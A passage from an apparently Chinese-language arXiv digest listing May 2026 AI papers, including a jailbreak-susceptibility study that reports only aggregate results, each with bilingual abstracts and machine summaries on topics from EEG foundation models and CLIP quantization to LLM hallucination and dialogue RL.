EEG foundation models, pre-trained on large-scale unlabelled EEG data, have emerged as a promising direction towards learning generalizable EEG representations. Despite showing positive results in data-rich regimes, they often fail to outperform significantly smaller supervised models in low-resource settings compared to fully supervised models. We provide a mechanistic account of this shortcoming, attributing it to a fundamental mismatch between reconstruction-based pretext tasks and the idiosyncratic spectral structure of EEG signals, which decompose into distinct high-power aperiodic and low-power oscillatory components. Using controlled, synthetically-generated EEG inputs, we demonstrate that EEG foundation model embeddings are biased to capture the aperiodic components of the EEG signal while under-representing oscillatory components, particularly at higher frequencies. Additionally, linear probe evaluations on real-world BCI datasets further reveal that embeddings encode subject identity more strongly than task-relevant information, thereby reinforcing the low-frequency and aperiodic component bias in foundation model embeddings trained primarily on reconstruction based objectives. Together, these findings elucidate a failure mode in reconstruction based EEG foundation models and motivate future work to incorporate auxiliary losses explicitly targeting high-frequency oscillatory structure as a path toward more capable and generalizable EEG representations.

2605.26429 2026-05-27 stat.ME cs.AI cs.LG stat.ML 版本更新

Structure-Adaptive Conformal Inference for Large-Scale Out-of-Distribution Testing

面向大规模分布外检测的结构自适应共形推断

Rongyi Sun, Wenguang Sun, Zinan Zhao

发表机构 * Center for Data Science and School of Mathematical Sciences, Zhejiang University(数据科学中心和数学科学学院,浙江大学)

AI总结 提出结构自适应共形q值(SCQ)和伪分数引导的直推式自动模型选择(P-TAMS),在成对可交换性下实现结构化分布外检测的有限样本错误率控制、功效提升和可解释性增强。

详情
AI中文摘要

本文针对高风险机器学习应用中的结构化分布外(OOD)检测问题。传统共形方法依赖于联合可交换性,难以融入时空或分组结构等辅助信息。为克服这一局限,我们提出结构自适应共形q值(SCQ),这是一种整合个体检验证据与结构模式的显著性指标。我们还开发了伪分数引导的直推式自动模型选择(P-TAMS),将共形化模型选择适应于候选模型工具箱中的结构化OOD检测。SCQ和P-TAMS共同在成对可交换性下形成一个统一框架,提供有限样本错误率控制、改进的功效和增强的可解释性。在模拟和真实数据上的实验表明,所提方法控制了错误发现率,并在多种设置下表现良好。

英文摘要

This paper addresses structured out-of-distribution (OOD) testing in high-stakes machine learning applications. Traditional conformal methods rely on joint exchangeability, making it difficult to incorporate auxiliary information such as spatiotemporal or grouping structures. To overcome this limitation, we propose the structure-adaptive conformal q-value (SCQ), a significance index that integrates individual test evidence with structural patterns. We also develop pseudo-score-guided transductive automated model selection (P-TAMS), which adapts conformalized model selection to structured OOD testing across a toolbox of candidate models. Together, SCQ and P-TAMS form a unified framework under pairwise exchangeability, providing finite-sample error-rate control, improved power, and enhanced interpretability. Experiments on simulated and real data demonstrate that the proposed approach controls the false discovery rate and performs well across diverse settings.

2605.26424 2026-05-27 cs.IR cs.AI cs.LG 版本更新

Uniboost: Global Coordination with Value Alignment for Fair and Efficient Traffic Allocation

Uniboost:基于价值对齐的全局协调实现公平高效的流量分配

Ge Fan, Nan Zhao, Kai Meng, Cong Luo, Yang Fu, Huiping Chu, Jialin Liu, Yuning Jiang, Bo Zheng

发表机构 * Taobao \& Tmall Group of Alibaba Hangzhou China Taobao \& Tmall Group of Alibaba Beijing China Taobao \& Tmall Group of Alibaba

AI总结 提出Uniboost统一流量分配框架,通过后验价值对齐机制和独立线性提升范式,解决耦合分配、分数膨胀和可解释性问题,提升流量分配效率和推荐性能。

Comments accepted by SIGIR 2026

详情
AI中文摘要

随着互联网服务的快速发展,推荐系统已变得不可或缺。特别是混合(重排序)阶段在跨不同业务目标分配流量中起着关键作用。然而,现有方法常受限于耦合的分配方案、分数膨胀和缺乏可解释性。为应对这些挑战,我们提出Uniboost,一个统一的流量分配框架。Uniboost引入后验价值对齐机制,将抽象模型分数校准到具有明确业务语义的锚定指标,显著增强可解释性。此外,它采用独立的线性提升范式来解耦复杂的加权方案,实现每个计划贡献的精确归因。我们通过在线A/B测试和深入数据分析验证了Uniboost的有效性,展示了三个关键发现:1)降低加权分数的整体权重有效减轻了意外的业务干扰,产生更高效的微观流量分配策略;2)事后分析和聚合仪表板提供了直观的宏观洞察,指导整体流量分配机制的设计;3)提出的“有效完成分数”作为易于获取的后验指标,为内容推荐管道提供了可靠的锚点。综合来看,我们的实验表明,Uniboost不仅在微观层面提升了流量分配效率和推荐性能,还为系统迭代提供了宏观指导。因此,这项工作为大规模工业推荐系统提供了一种高效可控的流量调节解决方案。

英文摘要

With the rapid evolution of internet services, recommendation systems have become indispensable. In particular, the blending (re-ranking) stage plays a pivotal role in allocating traffic across diverse business objectives. However, existing approaches often suffer from coupled allocation plans, score inflation, and a lack of interpretability. To address these challenges, we propose Uniboost, a unified traffic allocation framework. Uniboost introduces a posterior value alignment mechanism that calibrates abstract model scores to anchor metrics with explicit business semantics, significantly enhancing interpretability. Furthermore, it employs an independent linear boosting paradigm to decouple complex weighting schemes, enabling precise attribution of each plan's contribution. We validate the effectiveness of Uniboost through online A/B tests and in-depth data analysis, demonstrating three key findings: 1) Reducing the overall weight of weighted scores effectively mitigates unintended business interference, yielding a more efficient micro-level traffic allocation strategy; 2) Post-hoc analyses and aggregated dashboards provide intuitive, macro-level insights that guide the design of the overall traffic allocation mechanism; 3) The proposed "Effective Completion Score" serves as an easily obtainable post-metric that offers a reliable anchor for content recommendation pipelines. Collectively, our experiments show that Uniboost not only improves traffic allocation efficiency and recommendation performance at the micro level but also provides macro-level guidance for system iteration. Thus, this work provides an efficient and controllable traffic regulation solution for large-scale industrial recommendation systems.

2605.26415 2026-05-27 cs.CV cs.AI 版本更新

The Rescue Effect: Spatio-Semantic Early Exit Bypasses Quantization Collapse in CLIP

拯救效应:时空语义早期退出绕过CLIP中的量化崩溃

Kahyeon Nam, Hyesong Choi

发表机构 * Soongsil University(顺斯大学)

AI总结 针对CLIP模型INT8量化导致的表示崩溃问题,提出LRA-EE方法,通过时空语义聚合、多特征门控和层自适应阈值实现早期退出,在ImageNet-1K零样本分类中降低13.4% FLOPs并提升2.44%准确率。

详情
AI中文摘要

在资源受限的硬件上部署视觉-语言模型通常需要INT8量化,但在CLIP等联合嵌入架构中,这引入了一种不同于量化CNN分类器的故障模式:跨Transformer块累积的激活噪声扰乱了多模态嵌入的方向,侵蚀了零样本检索所依赖的余弦对齐。我们将此特征化为量化诱导的表示崩溃(QIRC),并在INT8 CLIP ViT-B/32上量化它,其中逐层噪声信号比从浅层块的低于10%增长到第11层的52%。我们提出LRA-EE(逐层表示感知早期退出),它通过时空语义聚合(用全局补丁令牌平均替代不成熟的浅层[CLS])、学习到的多特征门控(置信度、top-2间隔、空间激活方差)以及根据每层信息噪声比校准的层自适应置信阈值,绕过噪声饱和的深层。在ImageNet-1K零样本分类上,LRA-EE相比INT8基线减少了13.4%的FLOPs,并将Top-1准确率提高了+2.44个百分点(58.72% -> 61.16%)。四象限分解隔离了拯救效应:9.5%的样本在浅层出口被正确分类,但在全深度被噪声丢失,而只有7.1%遭受相反情况。

英文摘要

Deploying Vision-Language Models on resource-constrained hardware typically requires INT8 quantization, but in joint-embedding architectures such as CLIP this introduces a failure mode distinct from quantized CNN classifiers: activation noise accumulated across transformer blocks perturbs the direction of the multimodal embedding, eroding the cosine alignment on which zero-shot retrieval depends. We characterize this as Quantization-Induced Representation Collapse (QIRC) and quantify it on INT8 CLIP ViT-B/32, where the layer-wise noise-to-signal ratio grows from below 10% in shallow blocks to 52% at Layer 11. We propose LRA-EE (Layer-wise Representation-Aware Early Exit), which bypasses noise-saturated deep layers via Spatio-Semantic Aggregation (replacing the immature shallow [CLS] with a global patch-token average), a learned multi-feature gate (confidence, top-2 margin, spatial-activation variance), and Layer-adaptive Confidence Thresholding calibrated to each layer's Information-to-Noise Ratio. On ImageNet-1K zero-shot classification, LRA-EE reduces FLOPs by 13.4% and improves Top-1 accuracy by +2.44%p (58.72% -> 61.16%) over the INT8 baseline. A four-quadrant decomposition isolates the Rescue Effect: 9.5% of samples are correctly classified at shallow exits but lost to noise at full depth, against only 7.1% suffering the inverse.

2605.26414 2026-05-27 cs.AI cs.CL cs.LG 版本更新

Reasoning, Code, or Both? How Large Language Models Handle Variations in Math Questions

推理、代码,还是两者兼有?大型语言模型如何处理数学问题的变化

Matthew Kutakh

AI总结 本研究通过对比链式思维推理、单次代码执行和迭代代码执行三种方法在GSM-Symbolic数据集上的表现,发现代码执行并未提升大型语言模型在数学问题变体上的推理鲁棒性。

Comments 6 pages, 4 figures, 2 tables

详情
AI中文摘要

大型语言模型(LLMs)在数学推理基准测试中取得了令人印象深刻的准确性,但当问题被修改为不同的名字或数字等简单变化时,它们的性能会下降。代码执行方法允许模型生成并运行Python代码,而不是用自然语言进行推理,已被提出作为解决方案,但其对推理鲁棒性(即在问题变体中保持准确性的能力)的影响尚未得到系统测试。本研究在GSM-Symbolic数据集的1000个问题上评估了三种方法:使用链式思维(CoT)提示的纯推理、使用程序辅助语言模型(PAL)的单次代码执行,以及使用逐步编码(SBSC)的迭代代码执行。所有三种方法均在配对的原始问题和修改问题上使用Claude Haiku 4.5运行。CoT是最鲁棒的方法,在扰动下准确率下降1.3个百分点,1.8%的问题被破坏。PAL的鲁棒性最差,准确率下降1.7个百分点,3.1%的问题被破坏,SBSC介于两者之间。尽管这些差异在统计上不显著($p = .096$),但方向趋势在所有指标上一致,表明无论是单次还是迭代的代码执行,都没有提高小学水平问题变体的推理鲁棒性。

英文摘要

Large Language Models (LLMs) achieve impressive accuracy on mathematical reasoning benchmarks, yet their performance drops when problems are modified with simple changes like different names or numbers. Code execution methods, which let models generate and run Python code instead of reasoning in natural language, have been proposed as a solution, but their effect on reasoning robustness (the ability to maintain accuracy across problem variations) has not been systematically tested. This study evaluates three approaches on 1,000 problems from the GSM-Symbolic dataset: pure reasoning using chain-of-thought (CoT) prompting, single-shot code execution using Program-Aided Language models (PAL), and iterative code execution using Step-by-Step Coding (SBSC). All three were run on paired original and modified problems using Claude Haiku 4.5. CoT was the most robust method, with an accuracy drop of 1.3 percentage points and 1.8% of problems breaking under perturbation. PAL was the least robust at 1.7 percentage points and 3.1% broke, with SBSC falling in between. Although these differences were not statistically significant ($p = .096$), the directional trend was consistent across all measures, suggesting that code execution, whether single-shot or iterative, does not improve reasoning robustness on grade-school-level problem variations.

2605.26413 2026-05-27 stat.ME cs.AI cs.LG stat.ML 版本更新

Confounder Detection via Treatment Intent: A New Observational Study Design

通过治疗意图进行混杂检测:一种新的观察性研究设计

Drago Plecko, Patrik Okanovic, Torsten Hoefler, Elias Bareinboim

发表机构 * UCLA(加州大学洛杉矶分校) ETH Zurich(苏黎世联邦理工学院) Columbia University(哥伦比亚大学)

AI总结 提出一种通过询问治疗决策者比较配对单元来揭示未观测混杂因素的新研究设计,并在ICU数据中验证其有效性。

详情
AI中文摘要

理解干预的效果是科学进步的核心,随机对照试验(RCT)在许多应用领域被视为因果推断的金标准。然而,RCT成本高、耗时长,且常受伦理或实际限制,这促使我们需要能够从观察性数据中得出结论的因果方法。尽管此类数据收集规模日益扩大,但将其用于因果推断常因并非所有影响治疗分配和结果的变量都被观测到而受阻,这一问题称为未观测混杂。在本文中,我们介绍了一种称为通过治疗意图进行混杂检测的新研究设计。其思路是询问做出治疗决策的人类专家,并要求他们比较由原则性匹配策略提出的单元对,目的是引出解释治疗决策为何不同的未观测变量。我们为此类程序提供了理论基础,确定了此类研究设计可能引出未观测混杂因素的条件。基于这些新建立的基础,我们研究了重症监护病房(ICU)中干预的治疗效果。首先,我们展示了强烈表明ICU中收集的电子健康记录(EHR)存在未观测混杂的经验证据。通过使用临床文本笔记作为医生知识的代理并利用自然语言处理,我们在已知真实情况的半合成环境中为我们的方法提供了概念验证。

英文摘要

Understanding the effects of interventions is central to scientific progress, with randomized controlled trials (RCTs) regarded as the gold standard for causal inference in many applied fields. However, RCTs are costly, time-consuming, and often constrained by ethical or practical limitations, motivating the need for causal methods able to draw conclusions from observational data. While such data is collected at ever larger scale, making its use for causal inference is often hindered by the fact that not all variables affecting treatment allocation and the outcome are observed: an issue known as unobserved confounding. In this paper, we introduce a new study design called confounder detection via treatment intent. The idea is to query a human expert who makes treatment decisions, and ask them to compare pairs of units proposed by a principled matching strategy, with the goal of eliciting unobserved variables that explain why treatment decisions differ. We provide a theoretical basis for such a procedure, ascertaining conditions under which such a study design may elicit unobserved confounders. Building on this newly established foundations, we study treatment effects of interventions in the intensive care unit (ICU). First, we show empirical evidence strongly indicating that electronic health records (EHRs) collected in ICUs are subject to unobserved confounding. By using clinical text notes as a proxy for physicians' knowledge and leveraging natural language processing, we provide a proof of concept for our methodology in a semi-synthetic environment with a known ground truth.

2605.26409 2026-05-27 cs.CR cs.AI cs.LG 版本更新

Jailbreak susceptibility prediction and mitigation via the behavioral geometry of models

通过模型的行为几何进行越狱易感性预测与缓解

Hayden Helm, Xiaodong Liu, Weiwei Yang

发表机构 * Microsoft Research(微软研究院)

AI总结 本文通过形式化模型群体的行为几何,利用已评估和防御的模型,实现高效的易感性预测和防御迁移,在79个模型和100个系统配置上,易感性检测AUPRC达0.94且探针减少约98%,防御迁移性能优于同供应商分配。

详情
AI中文摘要

评估和缓解生成系统对越狱攻击的易感性对其安全部署至关重要。由于可部署系统的数量众多,对每种配置进行全面评估和优化是不切实际的。本文形式化了模型群体的行为几何,通过利用先前评估和防御过的模型,支持群体内高效的易感性预测和有效的防御迁移。我们将该框架应用于涵盖24个提供商的79个模型以及单个基础模型的100个系统配置。使用行为几何的简单方法在易感性检测中达到了0.94的AUPRC,与全面评估相比,探针数量减少了约98%。使用行为几何选择从哪个模型迁移优化后的防御,在无额外探针成本的情况下优于同供应商分配(+2%,p = 0.03),且一组三个模型足以覆盖整个群体。结果对超参数选择和评判者具有鲁棒性。

英文摘要

Evaluating and mitigating a generative system's susceptibility to jailbreak attacks is critical to its safe deployment. Given the number of deployable systems, full per-configuration evaluation and optimization is impractical. In this paper, we formalize the behavioral geometry of a population of models that, by leveraging previously evaluated and defended models, supports both efficient susceptibility prediction and effective defense transfer across a population. We apply the framework to 79 models spanning 24 providers and to 100 system configurations of a single base model. Simple methods that use the behavioral geometry reach an AUPRC of $0.94$ for susceptibility detection with $\approx98\%$ fewer probes relative to a full evaluation. Using the behavioral geometry to select which model to transfer an optimized defense from outperforms same-provider assignment ($+2\%$, $p = 0.03$) at no additional probe cost, with a set of three models sufficient to cover the population. Results are robust to hyperparameter selection and judge.

2605.26403 2026-05-27 cs.AI 版本更新

From Static Context to Calibrated Interactive RL: Mitigating Distribution Shift in Multi-turn Dialogue with Aligned Simulator

从静态上下文到校准的交互式强化学习:利用对齐模拟器缓解多轮对话中的分布偏移

Xiaohua Wang, Jiakang Yuan, Zisu Huang, Muzhao Tian, Changze Lv, Kaitao Song, Tao Chen, Xiaoqing Zheng

发表机构 * Fudan University(复旦大学)

AI总结 本文提出校准的交互式强化学习框架,通过将交互式强化学习与模拟器对齐相结合,缓解多轮对话中因策略和模拟器导致的分布偏移,提升对话质量。

详情
AI中文摘要

研究界的一个长期目标是开发高度交互的基于LLM的对话代理。最近的研究侧重于基于固定离线日志(静态上下文强化学习)或基于提示的模拟器(交互式强化学习)来优化策略。在这项工作中,我们从理论上证明,这两种范式都受到上下文分布偏移的根本限制——即训练期间观察到的对话历史与真实对话中遇到的对话历史之间的不匹配。这种偏移在每轮对话中呈二次方累积,严重降低对话质量。具体来说,我们将这种偏移归因于两个不同的来源:(i)策略引起的偏移,源于在静态历史而非自生成轨迹上进行训练;(ii)模拟器引起的偏移,源于模拟行为与真实人类行为之间的差异。为了解决这些挑战,我们提出了校准的交互式强化学习,这是一个统一的框架,将交互式强化学习与模拟器对齐相结合。通过将模拟器与人类交互模式对齐,我们的方法减少了模拟到真实的差距,并减轻了累积的分布偏移。在多个对话任务上的实验证实了我们的理论分析:(i)交互式强化学习通过缓解策略分布偏移,显著优于静态上下文基线;(ii)使用我们的对齐方法校准模拟器进一步弥合了模拟到真实的差距,产生了最先进的下游性能。

英文摘要

A long-standing goal of the research community is to develop highly interactive LLM-based dialogue agents. Recent research focuses on optimizing policies based on fixed offline logs (Static Context RL) or using a prompt-based simulator (Interactive RL). In this work, we theoretically show that both paradigms are fundamentally limited by context distribution shift--a mismatch between dialogue histories observed during training and those encountered in real conversations. This shift compounds quadratically over turns and severely degrades dialogue quality. Specifically, we attribute this shift to two distinct sources: (i) policy-induced shift, arising from training on static histories rather than self-generated trajectories; and (ii) simulator-induced shift, stemming from discrepancies between simulated and real human behaviors. To address these challenges, we propose Calibrated Interactive RL, a unified framework that couples interactive RL with simulator alignment. By aligning the simulator with human interaction patterns, our approach reduces the sim-to-real gap and mitigates compounding distribution shifts. Experiments across multiple dialogue tasks confirm our theoretical analysis: (i) Interactive RL significantly outperforms the Static Context baseline by mitigating policy distribution shift; and (ii) calibrating simulators with our alignment method further bridges the sim-to-real gap, yielding state-of-the-art downstream performance.

2605.26400 2026-05-27 cs.IR cs.AI 版本更新

Plans for Evaluating Structured Generative Search Summaries

评估结构化生成式搜索摘要的计划

Tetsuya Sakai, Jina Lee, Hanpei Fang, Young-In Song

发表机构 * Waseda University/Naver Corporation(早稻田大学/NAVER公司) Waseda University(早稻田大学) Naver Corporation(NAVER公司)

AI总结 提出一个评估大型语言模型生成的结构化搜索摘要的框架,该摘要包含概述、带标题的章节和引用源文档列表,并描述了实施和评估该框架的计划。

Comments 8 pages (including 2 pages for references)

详情
AI中文摘要

我们提出了一个评估结构化生成式搜索摘要的框架,这些摘要放置在自然网页搜索结果之上。由大型语言模型生成的结构化摘要通常包括一个概述、几个带有章节标题的章节,以及摘要中引用的源文档列表。然后,我们描述了实施和评估该框架的计划。

英文摘要

We propose a framework for evaluating structured generative search summaries that are placed atop organic web search results. A structured summary, generated by a large language model, typically consists of an overview, several sections with section titles, and a list of source documents that are cited within the summary. We then describe our plans for implementing and evaluating the framework.

2605.26385 2026-05-27 cs.IR cs.AI stat.ML 版本更新

Credit-assigned Policy Gradient for Early Stage Retrieval in Two-stage Ranking

两阶段排序中早期检索的信用分配策略梯度

Haruka Kiyohara, Mihaela Curmei, Ariel Evnine, Shankar Kalyanaraman, Israel Nir, Ana-Roxana Pop, Nitzan Razin, Sarah Dean, Thorsten Joachims, Udi Weinsberg

发表机构 * Computer Science Department, Cornell University, Ithaca, NY, USA(康奈尔大学计算机科学系) Central Applied Science, Meta, Menlo Park, CA, USA(Meta中央应用科学)

AI总结 针对两阶段排序中早期排序器(ESR)端到端训练难的问题,提出信用分配策略梯度(CA-PG),通过对目标项被选中的概率求梯度来降低方差,提升训练稳定性和收敛速度。

Comments ICML2026

详情
AI中文摘要

大规模搜索、推荐和检索增强生成(RAG)系统通常采用两阶段架构:早期排序器(ESR)生成候选集,随后由后期排序器(LSR)重新排序。虽然有许多强化学习(RL)方法用于训练LSR,但ESR的端到端训练被证明具有挑战性。特别是,朴素应用“普通”策略梯度(V-PG)对于实际使用的候选集大小不可扩展,因为方差爆炸。该问题源于V-PG将梯度传播到候选集的联合概率,忽略了候选集中每个特定项对奖励的贡献。为缓解此问题,我们提出了一种新颖的“信用分配”策略梯度(CA-PG),它计算相对于目标项在任何候选集中被选中的概率的梯度,即边际化所有包含它的候选集。我们的理论分析表明,CA-PG通过边际化候选集的具体组成显著降低了V-PG的方差,同时保留了在合理对齐的LSR策略下学习正确排序项的能力。在合成和真实数据上的实验表明,CA-PG提高了使用经典Plackett-Luce模型的ESR的收敛速度和训练稳定性,特别是在候选集大小较大时。

英文摘要

Large-scale search, recommendation, and retrieval-augmented generation (RAG) systems typically employ a two-stage architecture: an early-stage ranker (ESR) generates a candidate set, which is subsequently re-ranked by a late-stage ranker (LSR). While there are many reinforcement learning (RL) methods for training the LSR, end-to-end training of the ESR has proven challenging. In particular, naive application of "vanilla" policy gradient (V-PG) is not scalable for candidate-set sizes relevant for practical use due to exploding variance. This issue arises because V-PG propagates the gradient to the joint probability of the candidate sets, ignoring the contribution of each specific item in the candidate set to the reward. To mitigate this issue, we propose a novel "credit-assigned" policy gradient (CA-PG), which computes gradients with respect to the probability that the target item is chosen in any candidate set, i.e. marginalizing over all candidate sets that contain it. Our theoretical analysis reveals that CA-PG significantly reduces the variance of V-PG by marginalizing over the specific composition of the candidate set, while preserving the ability to learn the correct ranking of items under a reasonably aligned LSR policy. Experiments on both synthetic and real-world data demonstrate that CA-PG improves the convergence speed and training stability for ESRs utilizing the canonical Plackett-Luce model, especially when the candidate-set size is large.

2605.26380 2026-05-27 cs.CV cs.AI 版本更新

VisualNeedle: Benchmarking Active Visual Search in Information-Dense Scenes

VisualNeedle: 信息密集场景中的主动视觉搜索基准

Jingru Chen, Yiming Liu, Mingtao Chen, Sijie Chen, Richeng Xuan, Liang Yang, Zhichao Hu, Fanyang Lu

发表机构 * Hunyuan, Tencent(腾讯 Hunyuan) Peking University(北京大学) Zhejiang University(浙江大学)

AI总结 针对多模态大语言模型在细粒度感知基准中依赖捷径而非真实视觉证据的问题,提出VisualNeedle基准,通过反事实裁剪-黑化设置评估模型在信息密集场景中的主动视觉搜索能力,实验表明最佳模型准确率仅56.01%,落后人类63.00%。

详情
AI中文摘要

前沿多模态大语言模型(MLLMs)被报道在细粒度感知基准上达到超过90%的准确率。然而,这样的分数并不一定意味着对视觉证据的忠实使用。先前的研究已经识别出三种抬高基准性能的捷径。首先,问题中的语言先验和词汇线索使模型能够在未见图像的情况下推断出看似合理的答案。其次,来自视觉编码器的粗略全局语义可以绕过细粒度的局部细节。第三,在一些“用图像思考”的基准中,破坏视觉工具返回的中间图像几乎不影响最终答案。这些发现表明,仅靠更高的输入分辨率或更大的问题池并不能引发真正的主动视觉搜索。为了解决这个问题,我们引入了VisualNeedle,这是一个具有挑战性、信息密集且细粒度的基准,用于关键证据在空间上局限于微小区域且无法一眼看出的场景。我们进一步提出了一种反事实裁剪-黑化设置,将工具返回的裁剪区域替换为相同大小的黑色图像,以测试工具启用的性能是否真正依赖于中间视觉证据。我们在三种设置下评估了9个著名的MLLMs:无工具、标准工具启用和裁剪-黑化。无工具准确率保持在20%以下,最佳工具启用模型仅达到56.01%,仍落后于63.00%的人类多数投票准确率。这些结果揭示了细粒度视觉搜索中持续存在的局限性,而裁剪-黑化消融实验证实,VisualNeedle上的成功依赖于真正的中间视觉证据。

英文摘要

Frontier multimodal large language models (MLLMs) have been reported to achieve over 90% accuracy on fine-grained perception benchmarks. However, such scores do not necessarily imply faithful use of visual evidence. Prior studies have identified three shortcuts that inflate benchmark performance. First, linguistic priors and lexical cues in questions often enable models to infer plausible answers without seeing the image. Second, coarse global semantics from the visual encoder can bypass fine-grained local details. Third, in some ``think-with-images'' benchmarks, corrupting the intermediate images returned by visual tools barely affects the final answer. These findings suggest that higher input resolution or larger question pools alone do not elicit genuine active visual search. To address this, we introduce VisualNeedle, a challenging, information-dense, and fine-grained benchmark for scenes where critical evidence is spatially constrained to minute regions and not discernible at a glance. We further propose a counterfactual crop-black setting, which replaces crops returned by tools with black images of the same size, to test whether tool-enabled performance truly relies on intermediate visual evidence. We evaluate 9 promninent MLLMs across three settings: no-tool, standard tool-enabled, and crop-black. No-tool accuracy stays below 20\%, and the best tool-enabled model reaches only 56.01\%, still trailing the 63.00% human majority-vote accuracy. These results reveal persistent limitations in fine-grained visual search, while the crop-black ablation confirms that success on VisualNeedle hinges on genuine intermediate visual evidence.

2605.26376 2026-05-27 cs.CV cs.AI cs.LG 版本更新

BioFact-MoE: Biologically Factorized Mixture of Experts for Vision-Language Prognostic Modeling in Hepatocellular Carcinoma

BioFact-MoE:基于生物学因子分解的混合专家模型用于肝细胞癌的视觉-语言预后建模

Junlin Yang, Tian Yu, Nicha C. Dvornek, Yuexi Du, Peiyu Duan, Annabella Shewarega, Lawrence H. Staib, James S. Duncan, Julius Chapiro

发表机构 * Department of Radiology \& Biomedical Imaging, Department of Biomedical Engineering, Department of Electrical Engineering, Department of Statistics \& Data Science Yale University, New Haven, CT, 06510, USA

AI总结 提出BioFact-MoE框架,通过生物学监督的混合专家模型显式分解肝脏和肿瘤因子,在肝细胞癌预后预测中提升准确性和生物学可解释性。

Comments Early accepted at MICCAI 2026

详情
AI中文摘要

肝细胞癌(HCC)具有生物学异质性,由肝功能储备和肿瘤相关肿瘤学因素之间的相互作用塑造;因此,相似的生存结果可能反映根本不同的潜在生物学过程。HCC的预后建模依赖于来自多参数MRI和常规临床实践放射学报告的丰富多模态信息。现有的预后视觉-语言模型(VLM)学习单一的纠缠潜在表示,混合了肝脏和肿瘤相关因素,限制了准确性和生物学可解释性。我们提出BioFact-MoE,一个生物学因子分解的混合专家(MoE)框架,通过残差MoE生存架构中的生物学监督专家显式分解肝脏和肿瘤因素。在N=588名患者的HCC队列(在4,582个3D MRI图像-报告对上预训练)中,BioFact-MoE在所有时间范围内持续优于所有基线的生存预测,实现了12、18和24个月的AUC分别为75.33%、75.85%和73.96%。除了标量风险预测,门控专家权重实现了表型感知的风险分层。通路感知的门控揭示了临床上有意义的治疗相关生存异质性。在保留验证中,肝脏和肿瘤嵌入分别与肝功能标志物和肿瘤负荷标志物显示出选择性关联(p<0.05),无需监督。代码可在https://github.com/jy-639/BioFact-MoE获取。

英文摘要

Hepatocellular carcinoma (HCC) is biologically heterogeneous, shaped by the interplay between hepatic functional reserve and tumor-related oncologic factors; thus, similar survival outcomes may reflect fundamentally different underlying biological processes. Prognostic modeling in HCC is informed by rich multimodal information from multiparametric MRI and radiology reports from routine clinical practice. Existing prognostic vision-language models (VLMs) learn a single entangled latent representation that blends hepatic and tumor-related factors, limiting both accuracy and biological interpretability. We present BioFact-MoE, a biologically factorized Mixture of Experts (MoE) framework that explicitly decomposes liver and tumor factors via biologically supervised experts within a residual MoE survival architecture. On a HCC cohort of N=588 patients (pretrained on 4,582 3D MRI image-report pairs), BioFact-MoE consistently improves survival prediction over all baselines across time horizons, achieving 12-, 18-, and 24-month AUCs of 75.33%, 75.85%, and 73.96%. Beyond scalar risk prediction, gated expert weights enable phenotype-aware risk stratification. Pathway-informed gating uncovers clinically meaningful treatment-associated survival heterogeneity. In held-out validation, hepatic and tumor embeddings show selective associations with liver function and tumor burden markers, respectively (p<0.05), without supervision. The code is available at https://github.com/jy-639/BioFact-MoE.

2605.26362 2026-05-27 cs.CL cs.AI 版本更新

Why LLMs Hallucinate on Structured Knowledge: A Mechanistic Analysis of Reasoning over Linearized Representations

为什么LLMs会在结构化知识上产生幻觉:对线性化表示推理的机制分析

Shanghao Li, Jinda Han, Yibo Wang, Yuanjie Zhu, Zihe Song, Langzhou He, Kenan Kamel A Alghythee, Philip S. Yu

发表机构 * University of Illinois Chicago(伊利诺伊大学芝加哥分校) University of Illinois Urbana-Champaign(伊利诺伊大学厄巴纳-香槟分校)

AI总结 本文通过机制分析发现,大型语言模型在结构化知识推理中产生幻觉是由于注意力过度集中于捷径式结构线索和前馈层未能将知识语义接地,导致模型依赖参数记忆。

Comments To appear in Proceedings of ACL 2026

详情
AI中文摘要

在许多推理任务中,大型语言模型(LLMs)依赖于结构化外部知识,如图和表格,这些知识通常被线性化为连续的令牌表示。然而,即使有足够的知识可用,LLMs仍然可能产生幻觉输出,这种失败背后的潜在机制仍然知之甚少。我们研究了这些机制,发现幻觉源于系统性的内部动态而非随机噪声。首先,注意力不成比例地集中在类似捷径的结构线索上,而不是分布在完整的上下文中。其次,前馈表示未能将提供的知识接地,导致模型回归到参数记忆。此外,我们的结果表明,幻觉始终与前馈层中的语义接地失败相关,而注意力分配表现出更大的任务依赖性。最后,我们展示了这些机制模式从单跳图推广到多跳和表格设置,从而能够在结构化知识格式中有效检测幻觉。

英文摘要

In many reasoning tasks, large language models (LLMs) rely on structured external knowledge, such as graphs and tables, which is typically linearized into sequential token representations. However, even when sufficient knowledge is available, LLMs can still produce hallucinated outputs, and the underlying mechanisms behind such failures remain poorly understood. We investigate these mechanisms and find that hallucinations arise from systematic internal dynamics rather than random noise. First, attention disproportionately concentrates toward shortcut-like structural cues rather than distributing across the full context. Second, feed-forward representations fail to ground the provided knowledge, causing the model to revert to parametric memory. Moreover, our results indicate that hallucination is consistently associated with failures in semantic grounding within feed-forward layers, while attention allocation exhibits greater task-dependent variability. Finally, we show that these mechanistic patterns generalize beyond single-hop graphs to multi-hop and tabular settings, enabling effective hallucination detection across structured knowledge formats.

2605.26353 2026-05-27 cs.CV cs.AI cs.LG 版本更新

Personalized Generative Models for Contextual Debiasing

用于上下文去偏的个性化生成模型

Xinran Liang, Esin Tureci, Prachi Sinha, Ye Zhu, Vikram V. Ramaswamy, Olga Russakovsky

发表机构 * Department of Computer Science, Princeton University(普林斯顿大学计算机科学系) LIX, CNRS, École Polytechnique(巴黎政治学院LIX研究所,法国国家科学研究中心)

AI总结 提出DecoupleGen方法,利用个性化文本到图像扩散模型生成罕见上下文图像,作为训练增强以缓解视觉识别中的上下文偏差。

Comments CVPR 2026 Workshop on Synthetic Data for Computer Vision and Generative Models for Computer Vision. Code available at https://github.com/princetonvisualai/DecoupleGen

详情
AI中文摘要

不同的视觉模式在世界中出现的频率不同:例如,沙滩球出现在沙滩上比出现在道路上更常见。这些统计数据反映在视觉数据集中,因此训练好的模型更容易在常见场景中识别物体。然而,在道路上识别沙滩球可能比在沙滩上识别更重要。我们研究如何缓解这种差异。由于在现实世界中收集不常见的图像可能很困难,我们探索生成具有较少频繁上下文的图像是否可以作为有效的训练增强。一个关键挑战是引导生成保持在原始数据集分布附近,同时创建具有不常见上下文的多样化图像。我们引入了DecoupleGen方法,该方法个性化文本到图像扩散模型,以促进罕见上下文图像的连贯合成,同时保留原始视觉细节。生成的图像包含语义上有意义的内容,并在视觉上与原始数据集保持一致。我们进一步应用验证约束以确保增强数据的相关性。我们在复杂场景数据集上的物体分类和识别任务中评估了我们的方法。实验表明,我们的方法比先前的方法有一致的改进,并且我们的分析确定了这些改进背后的因素。

英文摘要

